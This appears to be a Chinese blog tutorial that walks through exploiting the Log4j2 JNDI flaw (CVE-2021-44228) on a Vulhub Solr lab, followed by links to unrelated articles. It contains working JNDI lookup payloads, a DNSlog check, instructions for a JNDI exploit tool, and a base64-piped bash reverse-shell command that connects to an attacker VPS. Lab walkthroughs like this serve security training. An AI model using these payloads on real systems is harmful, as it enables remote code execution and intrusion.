当前位置: 首页 > news >正文

Log4j2漏洞vul-hub通关教程

启动环境:

1.首先我们来到我们的来到靶场这里博主是在自己的vps上面docker上面搭接的vul-hub启动环境输入我们的命令:

cd vulhub/log4j/CVE-2021-44228
docker-compose up -d显示这样就代表成功启动了。
2.然后我们输入我们vps的IP地址然后加上给的端口去浏览器访问,看到成功访问到了。

检查漏洞是否存在:

3.然后我们来验证漏洞,我们需要准备一个DNSlog平台来验证是否存在漏洞,

4.然后将上面dnslong给的后缀添加到这条命令末尾:/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.0jhatp.dnslog.cn},然后拼接在原网站后面去访问。

5.去dnslog平台点击一下刷新就可以看到带出来的信息了。说明存在漏洞!!!

漏洞利用:

6.然后我们直接新建一个主机,并且监听端口

下载安装JDNI:

项目地址:https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0

反弹shell

7.然后将我们反弹shell的命令经过bae64编码后填入我们的代码模板执行。

反弹shell命令:bash -i >& /dev/tcp/自己的vpsIP/端口 0>&1

命令模板:

java -jar target/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c
{echo,[经过base64编码后的命令]}|{base64,-d}|bash" -A [你的vpsip]

执行后:

8.然后将生成的恶意代码类插入命令模板后面。命令模板:/solr/admin/cores?action=${jndi:填充}

9.然后将命令拼接在url后面访问即可

10.连接成功后去我们监听的那个机器就可以执行命令了。

http://www.dtcms.com/a/295015.html

相关文章:

  • 根据图片的r值来进行透明剔除
  • SpringBoot RESTful API设计指南
  • C++day1
  • #Linux内存管理# 在一个播放系统中同时打开几十个不同的高清视频文件,发现播放有些卡顿,打开视频文件是用mmap函数,请简单分析原因。
  • SQL难点突破之复杂业务逻辑的SQL查询实战
  • pcb碳油板工艺流程
  • zabbix基于GNS3监控部署
  • 学校电子钟系统时间为何不同步?如何解决
  • 面试实战,问题六,被问数据库索引,怎么回答
  • 期权遇到股票分红会调整价格吗?
  • 使用JMeter进行压力测试(以黑马点评为例、详细图解)
  • 定义损失函数并以此训练和评估模型
  • 力扣面试150题--搜索旋转排序数组
  • RT_thread的工作原理及应用
  • java有哪些字符需要转译
  • 2026 拼多多秋招内推码(提前批)
  • 前端学习之JavaScript事件监听解析
  • Bonk发币教学全流程
  • 欧盟网络安全标准草案EN 18031详解
  • JDialong弹窗
  • 计算机网络学习----Https协议
  • 亚马逊云科技 上海AI研究院 突然解散 | AI早报
  • 13. event.target 和 event.currentTarget 区别
  • 【C语言进阶】动态内存管理(2)
  • 力扣(LeetCode) ——轮转数组(C语言)
  • Unity UI的未来之路:从UGUI到UI Toolkit的架构演进与特性剖析(2)
  • 【Web APIs】JavaScript 节点操作 ⑦ ( 创建节点案例 | 网页评论功能 )
  • 旅游管理虚拟仿真实训室:重构实践教学新生态
  • 掌握Autofac:IOC容器实战指南
  • GaussDB view视图的用法